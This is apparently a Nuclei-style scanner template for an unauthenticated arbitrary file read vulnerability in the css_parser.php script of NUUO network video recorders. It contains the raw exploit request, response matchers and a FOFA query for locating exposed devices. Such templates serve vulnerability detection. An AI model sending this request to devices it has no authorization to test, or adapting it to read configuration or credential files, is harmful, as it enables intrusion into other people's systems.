http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - echo $file;
            - <?php
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /css_parser.php?css=css_parser.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
id: NUUO-css_parser_php-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="www.nuuo.com/eHelpdesk.php"
        NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: NUUO网络视频录像机 css_parser.php 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487417&idx=1&sn=701faa49786e548432cd86eaf78e4144&chksm=c267ba8af510339c6356cf368f74d1ad5cfe009093c3401fe15cfa4209e07f93dc77fd1ce3f5&token=286085064&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - parse
